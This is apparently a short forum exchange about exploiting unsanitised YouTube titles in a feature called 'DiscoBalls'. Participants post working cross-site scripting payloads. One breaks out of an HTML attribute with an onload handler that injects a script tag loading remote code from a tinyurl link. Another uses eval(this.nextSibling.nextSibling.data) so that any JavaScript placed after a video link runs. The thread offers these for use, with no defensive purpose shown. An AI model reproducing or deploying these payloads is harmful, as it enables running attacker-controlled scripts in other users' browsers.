DiscoBalls doesn't sanitise youtube titles
-
Could this be made simpler (idk, don't have the time)
even after fixing that my console says no
Try:
" onload="$('<script>').appendTo($('body')).attr('src','https://tinyurl.com/jnj52xh')"
Also, I realized that you could use
eval(this.nextSibling.nextSibling.data)
and just put the JS right after the video link. E.g. in the original post, using the inspector to change the event handler toalert(this.nextSibling.nextSibling.data)
makes it alert "Yes!".Then, as a bonus, the one video could be used to play any javascript you'd want.
-